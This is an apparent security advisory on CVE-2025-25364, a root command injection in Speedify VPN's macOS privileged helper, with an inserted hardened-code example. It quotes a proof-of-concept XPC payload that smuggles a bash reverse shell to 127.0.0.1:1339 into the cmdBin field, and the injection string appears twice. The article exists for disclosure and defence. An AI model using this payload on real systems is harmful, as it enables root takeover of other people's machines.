A major security flaw in the Speedify VPN application for macOS, tracked as CVE-2025-25364, has exposed millions of users to the risk of complete system compromise.
Researchers at SecureLayer7 discovered the vulnerability in Speedify’s privileged helper tool. It could potentially allow local attackers to execute arbitrary commands as root and take total control of affected systems.
The root of the problem lies within the me.connectify.SMJobBlessHelper XPC service—a helper tool that runs with elevated (root) privileges to perform system-level network operations for Speedify.
This service, installed as a privileged daemon via /Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper, is configured to receive and process commands from the main Speedify app via Apple’s XPC messaging system.
| Aspect | Details |
| --- | --- |
| CVE ID | CVE-2025-25364 |
| Affected Product | Speedify VPN |
| Affected Version | 15.0.0 (macOS) |
| Patched Version | 15.4.1 |
| Component | me.connectify.SMJobBlessHelper (Privileged Helper Tool at /Library/PrivilegedHelperTools/) |
| Vulnerability Type | Command Injection |
Because the helper does not properly validate the fields of incoming XPC messages, in particular cmdPath and cmdBin, a local attacker can craft a malicious payload.
These fields are embedded directly into the command string without sanitization, so an attacker can inject arbitrary shell commands, which the helper tool then executes with root privileges.
Three key functions are at the heart of this vulnerability. In the decompiled call that builds the command string, the caller-supplied value (rcx) is interpolated straight into a shell command line:
rax = asprintf(&var_38, "codesign -v -R=\"certificate leaf[subject.CN] = \"%s\" and anchor apple generic\" \"%s\"", "…", rcx);
A threat actor can set cmdBin or cmdPath to a string such as "; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo " to open a root shell connection to an external server.
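To make the injection mechanics concrete, the following is an added example (not Speedify's code) that contrasts the asprintf-into-shell pattern described above with a hardened variant that validates both fields and spawns codesign by absolute path with an argv array, so no shell ever parses the caller's bytes. The simplified codesign command line, the allow-listed root /Applications/ and all function names are assumptions made for this example.

```c
#define _GNU_SOURCE
#include <ctype.h>
#include <spawn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>

extern char **environ;

/* Vulnerable pattern (simplified from the article): caller-controlled
 * strings are spliced into a shell command line. A value containing a
 * closing quote and ';' breaks out of the quoted argument, so whatever
 * follows runs as a separate command (as root in the real helper). */
static char *build_shell_command(const char *cmd_path, const char *cmd_bin) {
    char *cmd = NULL;
    if (asprintf(&cmd, "codesign -v \"%s/%s\"", cmd_path, cmd_bin) < 0) return NULL;
    return cmd; /* caller frees */
}

/* Hardened input checks: cmd_bin must be a bare file name (no leading '-',
 * so it cannot be read as an option), cmd_path must sit under an
 * allow-listed root. The root is a constructed value for this example. */
static int is_safe_component(const char *s) {
    if (!s || !*s || *s == '-') return 0;
    for (; *s; s++)
        if (!isalnum((unsigned char)*s) && *s != '.' && *s != '_' && *s != '-') return 0;
    return 1;
}

static int is_allowed_path(const char *p) {
    const char *root = "/Applications/";
    return p && strncmp(p, root, strlen(root)) == 0 && strstr(p, "..") == NULL;
}

/* Hardened execution: validate first, then spawn the tool by absolute path
 * with an argv array. Returns the child's exit status, -1 when validation
 * rejects the input, -2 when the spawn itself fails. */
static int run_codesign_safely(const char *cmd_path, const char *cmd_bin) {
    if (!is_allowed_path(cmd_path) || !is_safe_component(cmd_bin)) return -1;
    char *target = NULL;
    if (asprintf(&target, "%s/%s", cmd_path, cmd_bin) < 0) return -2;
    char *argv[] = {"codesign", "-v", target, NULL};
    pid_t pid;
    int rc = posix_spawn(&pid, "/usr/bin/codesign", NULL, NULL, argv, environ);
    free(target);
    if (rc != 0) return -2;
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -2;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -2;
}
```

In the hardened path the injected bytes never reach a shell; they are rejected before any process is spawned, and even a value that passed validation would arrive at codesign as a single argv element.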
Researchers released a proof-of-concept (PoC) exploit written in Objective-C, using the XPC APIs to connect to the vulnerable helper and send a crafted payload.
The payload triggers arbitrary code execution as root, such as spawning a reverse shell. Here's a relevant snippet:
xpc_dictionary_set_string(message, "cmdPath", "/tmp");
const char *injectionPayload = "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";
xpc_dictionary_set_string(message, "cmdBin", injectionPayload);
The impact of this flaw is critical: an attacker with local access could gain full root control, modify sensitive files, install persistent malware, and exfiltrate data.
Since most Speedify VPN users rely on the app for privacy, this vulnerability could have undermined the security of a broad user base.
Speedify users are strongly advised to upgrade to version 15.4.1 or above, which addresses the flaw with a complete helper tool rewrite, stricter input validation, and the removal of insecure XPC handling.
The incident highlights the paramount importance of rigorous input validation in all privileged code.